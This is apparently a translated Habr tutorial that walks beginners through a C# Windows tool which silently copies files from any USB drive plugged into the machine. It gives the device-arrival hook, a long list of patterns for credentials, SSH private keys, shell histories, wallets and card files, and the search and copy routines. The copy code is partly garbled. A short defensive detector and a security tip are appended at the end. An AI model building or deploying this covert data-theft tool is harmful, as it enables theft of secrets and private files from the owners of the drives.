Writing a program to steal data from a USB-drive in Windows

Task:

Write software that copies files, without authorization, from a legitimately connected USB device and that requires neither installation nor administrator rights.

That is, legitimate software that attackers can use to cause harm (according to the interpretation of one of the antivirus tools).

Algorithm of the program

Audience:

Beginner programmers and anyone who is simply interested.



An example of how an attacker might use the software:



We write the program:

1. We catch the connection of the USB device

Overriding the WndProc Method
protected override void WndProc(ref Message m)//  : base.WndProc(ref m); const int WM_DeviceChange = 0x219; //-   usb const int DBT_DEVICEARRIVAL = 0x8000; //  const int DBT_DEVICEREMOVECOMPLETE = 0x8004; //   if (m.Msg == WM_DeviceChange) Thread T = new Thread(_); if (m.WParam.ToInt32() == DBT_DEVICEARRIVAL) T.Start();// usb  if (m.WParam.ToInt32() == DBT_DEVICEREMOVECOMPLETE) T.Abort();// usb  




2. Choose the file formats to search for (in whatever order you prefer, because everyone decides for themselves which type of files to copy first)

The file types are stored, for example, in a list box (listBox2):
*.ppk

*.pref

*.remmina

*.sh

*.txt

*.ml*

*access*.txt

*account*

*accs*.txt

*admin*.txt

*amazon*.txt

*authorized_keys*

*balance*.txt

*bash_history*

*billing*.txt

*btc*.txt

*brute*

*c6ep*.txt

*cepep*

*codes*

*connect*

*contacts*.txt

*database*

*dedic*.txt

*dedik*.txt

*domain*.txt

*ftp*.txt

*hack*.txt

*host*.txt

*icq*.txt

*id_*sa*

*id_dsa*

*id_rsa*

*known_hosts*

*ksh_history*

*login*

*mail*.txt

*merchant*.txt

*money*

*myadmin*.txt

*mysql_history*

*nano_history*

*parol*

*pass*

*pentest*

*pgsql_history*

*pma*.txt

*pref*

*qwerty*

*rdp*.txt

*remmina*

*root*

*serv*.txt

*sh_history*

*srv*.txt

*todo*.txt

*userid*

*users*

*vds*.txt

*vpn*.txt

*vps*.txt

*vuln*.txt

*wallet*

*webmon*

*zsh_history*

access.txt

adm.txt

all.txt

bill.txt

card.txt

cards.txt

cc.txt

centos.txt

data.txt

ded.txt

ftps.txt

full.txt

hdd.txt

host.txt

id.txt

info.txt

key.txt

linux.txt

mail.txt

mails.txt

pern*.txt

skype*.txt

sql*.txt

ssh*.txt

sys.txt

tconn.conf

toor.txt

ubuntu.txt

usb.txt

user.txt

virtual.txt

*pass*

*pwd*

*login*

*vk.com*



*.xls*

*.doc*

*.rtf

*.JPG

*.jpeg

*.pgf

*.bmp

*.cr2

*config*






3. Search for files on the USB drive.

Search function:
 private ArrayList F;//    private void _() Thread.Sleep(4000);//         foreach (var dInfo in DriveInfo.GetDrives()) if (dInfo.IsReady && dInfo.DriveType == DriveType.Removable) for (int i = 0; i < listBox2.Items.Count; i++) { foreach (string file in Directory.GetFiles(@dInfo.Name, listBox2.Items[i].ToString(), SearchOption.AllDirectories)) F.Add(new FILEclass(file, Path.GetFileName(file))); } 




5. Copy files from a connected USB-drive to your computer

Copy function
 private void cheat() ... ... //    Directory.CreateDirectory("Liked " + DateTime.Now.Year + "." + DateTime.Now.Month + "." + DateTime.Now.Day); int copied = 0; int copy_err = 0; int exist = 0; for (int i = 0; i < F.Count; i++) { string sourceName = Path.GetFileName((((FILEclass)(F[i])).Fullname)); string source = ((FILEclass)(F[i])).Fullname; string dest = Dir + @"\" + ((FILEclass)(F[i])).name; string destName = Path.GetFileName(Dir + @"\" + ((FILEclass)(F[i])).name); if (sourceName.Equals(destName)) if (File.Exists(source)) if (File.Exists(dest)) try { if (FileCompare(source, dest)) exist++; //    else//  -   File.Copy(source, Dir + @"\" + Timenow() + "s. " + ((FILEclass)(F[i])).name); copied++; } catch{copy_err++; }//   USB-  else { try File.Copy(source, dest); catch { copy_err++; } copied++; } else copy_err++; } 


Function for comparing two files

    // https://support.microsoft.com/ru-ru/kb/320348
    private bool FileCompare(string file1, string file2)
    {
        int file1byte;
        int file2byte;
        FileStream fs1;
        FileStream fs2;

        // The same path was passed twice: the files are identical.
        if (file1 == file2)
            return true;

        fs1 = new FileStream(file1, FileMode.Open);
        fs2 = new FileStream(file2, FileMode.Open);

        // Different lengths: the files differ.
        if (fs1.Length != fs2.Length)
        {
            fs1.Close();
            fs2.Close();
            return false;
        }

        do
        {
            // Read one byte from each file until a mismatch or the end of the file.
            file1byte = fs1.ReadByte();
            file2byte = fs2.ReadByte();
        } while ((file1byte == file2byte) && (file1byte != -1));

        fs1.Close();
        fs2.Close();
        return ((file1byte - file2byte) == 0);
    }


6. Logging

By adding a log, you can easily see the approximate folder structure on a USB device and what is copied:



14.08.2015 21:25:13 =============================================
14.08.2015 21:25:17
14.08.2015 21:25:18   F:\123hack.txt
14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\App1.csproj.FileListAbsolute.txt
14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\LanguageQualifiers.txt
14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\ProjectArchitectures.txt
14.08.2015 21:25:18   F:\ \\Cisco Mars incident parser\Cisco Mars incident parser\obj\Debug\Cisco Mars incident parser.csproj.FileListAbsolute.txt
14.08.2015 21:25:18   F:\ \\dots\dots\obj\Debug\dots.csproj.FileListAbsolute.txt
14.08.2015 21:25:18   F:\ \\genovirus\genovirus\Assets\AboutAssets.txt
14.08.2015 21:25:18   F:\ \\genovirus\genovirus\Resources\AboutResources.txt
14.08.2015 21:25:18   F:\ \\TheGenoVirus\TheGenoVirus\obj\Debug\ResourceTypeUsage.txt
14.08.2015 21:25:18   F:\ \\TheGenoVirus\TheGenoVirus\obj\Debug


7. Copying data from external HDDs will be left as “homework”



Findings:

Do not store sensitive information on removable USB devices, and do not connect them to untrusted devices.
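On the host side, the behaviour described above (a pause after device arrival, then one process touching many files across the drive within a second or two) is detectable. The following is an added example, not code from the original article: it flags any process that reads many distinct files from a removable drive shortly after it is connected. The event tuples, process names, paths and thresholds are constructed assumptions; in practice the events would come from device-arrival logging combined with file auditing on removable storage.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample events (not real log output): (time, kind, drive, process, path).
EVENTS = [
    ("2015-08-14 21:25:13", "arrival", "F:", "", ""),
    ("2015-08-14 21:25:17", "read", "F:", "copytool.exe", r"F:\keys\id_rsa"),
    ("2015-08-14 21:25:18", "read", "F:", "copytool.exe", r"F:\notes\todo.txt"),
    ("2015-08-14 21:25:18", "read", "F:", "copytool.exe", r"F:\NOTES\TODO.TXT"),
    ("2015-08-14 21:25:18", "read", "F:", "copytool.exe", r"F:\notes\vpn.txt"),
    ("2015-08-14 21:25:18", "read", "F:", "copytool.exe", r"F:\work\passwords.xls"),
    ("2015-08-14 21:25:18", "read", "F:", "copytool.exe", r"F:\work\config.ini"),
    ("2015-08-14 21:25:18", "read", "F:", "copytool.exe", r"F:\photo\scan.jpg"),
    ("2015-08-14 21:25:40", "read", "F:", "winword.exe", r"F:\work\report.doc"),
    ("2015-08-14 21:30:00", "removal", "F:", "", ""),
    ("2015-08-14 21:30:05", "read", "F:", "copytool.exe", r"F:\stale.txt"),
]

def flag_bulk_readers(events, window=timedelta(seconds=30), min_files=5):
    """Return processes that read >= min_files distinct files within `window` of arrival."""
    arrivals = {}              # drive -> time of the current arrival
    reads = defaultdict(set)   # (drive, process, arrival time) -> distinct paths
    first_read = {}            # same key -> time of first read
    for ts, kind, drive, process, path in sorted(events):
        t = datetime.strptime(ts, FMT)
        if kind == "arrival":
            arrivals[drive] = t
        elif kind == "removal":
            arrivals.pop(drive, None)      # later reads have no arrival to anchor to
        elif kind == "read" and drive in arrivals and t - arrivals[drive] <= window:
            key = (drive, process, arrivals[drive])
            reads[key].add(path.lower())   # Windows paths are case-insensitive
            first_read.setdefault(key, t)
    findings = []
    for (drive, process, arrived), paths in reads.items():
        if len(paths) >= min_files:
            delay = (first_read[(drive, process, arrived)] - arrived).total_seconds()
            findings.append({"drive": drive, "process": process,
                             "files": len(paths), "delay_s": delay})
    return findings

if __name__ == "__main__":
    for finding in flag_bulk_readers(EVENTS):
        print(finding)
```

The threshold and window need tuning against legitimate bulk readers such as backup or antivirus software, which are better handled with an allowlist than with a higher file count.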

Ready example in "Cloud@mail.ru"



www.virustotal.com: 1/56 (the "VBA32" antivirus detects it as "Trojan.MSIL.gen.11").

Source: https://habr.com/ru/post/264513/


